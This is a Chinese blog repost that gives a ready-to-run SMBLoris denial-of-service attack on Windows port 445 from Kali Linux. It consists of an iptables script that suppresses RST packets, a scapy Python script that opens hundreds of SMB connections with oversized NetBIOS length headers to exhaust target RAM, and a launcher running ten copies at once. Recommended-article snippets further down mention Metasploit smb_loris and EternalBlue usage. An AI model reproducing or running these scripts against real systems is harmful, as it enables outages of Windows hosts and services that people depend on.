kali下利用smb漏洞实现DDOS(SMBLoris攻击消耗windows RAM)

最新推荐文章于 2024-03-20 23:35:29 发布
最新推荐文章于 2024-03-20 23:35:29 发布
阅读量742 收藏
点赞数
文章标签: 网络 python
原文链接:https://yq.aliyun.com/articles/628544
版权
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396567

参考:https://v.qq.com/x/page/d0532b3e7p6.html?start=36
http://www.freebuf.com/news/142697.html

目标开放445端口,windows系统。
攻击者kali最新版(2017年8月3日 21:42:20)

cat rst.sh

#!/bin/bash
iptables -F
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

cat smb3.py

from scapy.all import *
import sys
p0 = int(sys.argv[1])
conf.L3socket
conf.L3socket=L3RawSocket
i=IP()
i.dst="目标IP"
t=TCP()
t.dport=445

for p in range(p0,p0+700):
  print p
  t.sport = p
  t.flags = "S"

  r=sr1(i/t)
  rt=r[TCP]
  t.ack=rt.seq+1
  t.seq=rt.ack
  t.flags="A"
  sbss='\x00\x01\xff\xff'
  send(i/t/sbss)

cat run10.sh

#!/bin/bash
python smb3.py 0 &
python smb3.py 1000 &
python smb3.py 2000 &
python smb3.py 3000 &
python smb3.py 4000 &
python smb3.py 5000 &
python smb3.py 6000 &
python smb3.py 7000 &
python smb3.py 8000 &
python smb3.py 9000 &

运行run10.sh开始攻击测试。

weixin_34278190
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全kali渗透学习 web渗透入门 Metasploit---基于SMB协议收集信息
xueshenlaila的博客
03-04 3000
SMB概述:服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common InternetFile System,缩写为CIFS),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。 经过Unix服务器厂商重新开发后,它可以用于连接Unix服务器和Windows客户机,执行打印和文件共享等任务。 使用smb_version 基于SMB协议扫描版本号 msf6 > use auxiliary.
kali下经典的ddos攻击软件_Kali-DDoS工具集合
weixin_39776344的博客
12-22 1941
1、SSL连接耗尽工具(thc-ssl-dos)root@kali:~/DDoS_tool/web#thc-ssl-dos-h__________________________\_____/|\\____\||/~\/\\/||\Y/\\____|____|\___|_/...
Kali渗透之基于SMB协议收集信息
m0_56988395的博客
02-20 1739
目录 工具 靶机 使用smb_version基于SMB协议扫描版本号 使用smb_enumshares基于SMB协议扫描共享文件(账号,密码) 使用smb_lookupsid扫描系统用户信息(SID枚举) 工具 Metasploit 靶机 Windows 2008 R2 SMB:服务器消息块,又称网络文件共享系统,一种应用层网络传输协议,主要功能是使网咯上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。445端口 使用smb_version基于SMB协议扫描版.
小白日记12:kali渗透测试之服务扫描(二)-SMB扫描
ZiXuanFY的博客
09-12 1万+
SMB扫描 Server Message Block 协议。与其他标准的TCP/IP协议不同,SMB协议是一种复杂的协议,因为随着Windows计算机的开发,越来越多的功能被加入到协议中去了,很难区分哪些概念和功能应该属于Windows操作系统本身,哪些概念应该属于SMB 协议。因为该协议很复杂,所以是微软历史上出现安全问题最多的协议。 1、Nmap 最简单的方法:扫描其固定
SMBLoris windows拒绝服务漏洞
weixin_30588907的博客
08-03 195
在美国拉斯维加斯举行的2017年度DEF CON黑客大会上,安全研究人员公布了Windows系统上的一个长达20年没有发现的漏洞,该漏洞名为“SMBLoris”,黑客可以轻松的使用简短的20行代码利用漏洞即可发起DoS攻击导致系统内存资源耗尽,该漏洞影响Windows 2000及以上系统的SMBv1协议。 from scapy.all import * import sys p0 =...
基于Kali的一次DDos攻击实践
热门推荐
m0_60028455的博客
02-24 2万+
镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 一、什么是DDos攻击 DDOS(Distributed Denial of Service),即分布式拒绝服务,是一种针对于网络服务的攻击行为。对于 DDOS 我们可以这样通俗地理解,假如有一家商店在售卖商品,突然涌过来一大帮人说要买东西,这里面有的人是真正的顾客,有的人只是过来捣乱的,但是售货员可能就会崩溃了(不知道该卖给谁),就会导致一种拒绝服务攻击了。而分布式拒绝服务攻击,则是因为黑客控制了很多台肉鸡来发动攻击。这种攻击近些年来越来越流行,对于
Kali WIndows 漏洞利用基础篇 (探索目标主机漏洞
江南一只猫
10-07 9437
通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞。因为很多教程只说了用什么漏洞攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体化在笔记本电脑上) 一.工具介绍 namp 一款可以探测主机的基本信息的扫描工具,数据包中包含扫描主机的开启端口,端口使用的服务,和一些系统信息。 msf一个极为强大的漏洞利用工具不管是系统漏洞,还...
ensp加kali实现arp欺骗攻击
04-21
网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
Kali学习 | 漏洞利用:4.9 渗透攻击Samba 服务
qq_43233085的博客
01-12 3465
Kali学习 | 漏洞利用:4.9 渗透攻击 Samba 服务Samba 介绍操作步骤 Samba 介绍 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 Samba服务对应的端口有139和445等,只要开启这些端口后,主机就可能存在Samba服务远程溢出漏洞。 操作步骤 (1)启动MSF终端。执行命令如下所示: msfcons...
使用kali进行渗透测试--攻击实例:Windows 2008
lxy123_com的博客
02-04 5162
实验环境:Kali虚拟机一台、4G运行,Windows 2008靶机一台,IP地址192.168.22.138 实验目的:使用kaliWindows 2008进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss进行扫描 2,开启metasploit框架进行扫描 msf6 > db_nmap -A -T4 192.168.22.138 使用nmap进行扫描 (二),进行渗透测试 扫描smb版本信息 msf6 > search s
kali 使用 msf通过sm17_010漏洞拿到Windows shell
kk的博客
07-30 461
3、找到msf的工具目录,进入smb_ms17_101漏洞利用模块,使用search ms17_010查看可用模块、使用show optionsc查看可支持命令与参数。1、nessus扫描目标系统的IP拿到系统漏洞信息(存在ms11_030、ms17_010、ms16_047漏洞),本教程以ms17_010为例讲解。serach vce:VCE-2017-8464 type:exploit # 查找漏洞VCE-2017-8464的利用方法与模块。modules:存储metasploit的模块文件。
Kali:简单实现永恒之黑的复现,漏洞CVE-2020-0796
2201_75638644的博客
03-12 1342
Kali:简单实现永恒之黑的复现,漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒之黑,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒之黑(CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
利用samba漏洞入侵linux主机(samba低版本漏洞利用
weixin_62870602的博客
08-11 3198
复现samba漏洞入侵linux主机
利用smb_loris漏洞对目标进行拒绝服务攻击(dos)
Cwillchris的博客
10-18 423
在进行 SMBloris拒绝服务攻击之前,要先设置攻击机的最大连接数。 ┌──(root????kali)-[~/desktop] └─# ulimit -n 65535 1、使用smb_loris攻击,设置目标机ip,执行 msf6 > use auxiliary/dos/smb/smb_loris msf6 auxiliary(dos/smb/smb_loris) > set rhost 172.16.12.4 rhost => 172.16.12.4 msf6 au
SMB协议——永恒之蓝漏洞利用
浅浅的博客
03-06 1万+
SMB — 永恒之蓝漏洞利用 1、实验环境: 攻击机:kali IP:192.168.247.158 被攻击机:Win 7 IP:192.168.247.150 2、实验步骤: 被攻击机Win 7: 在被攻击机Win 7中开启SMB1,HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/services/LanmanServe...
Kali linux——文件共享samba的安装与配置
m0_65544268的博客
07-11 3216
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。
永恒之蓝漏洞复现(详细版)
最新发布
Zqinglele的博客
03-20 3111
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击
SMB服务漏洞MS17-010渗透测试
sinat_41880528的博客
07-03 1万+
1.MS17-010漏洞简介     MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞,远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-2017014...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值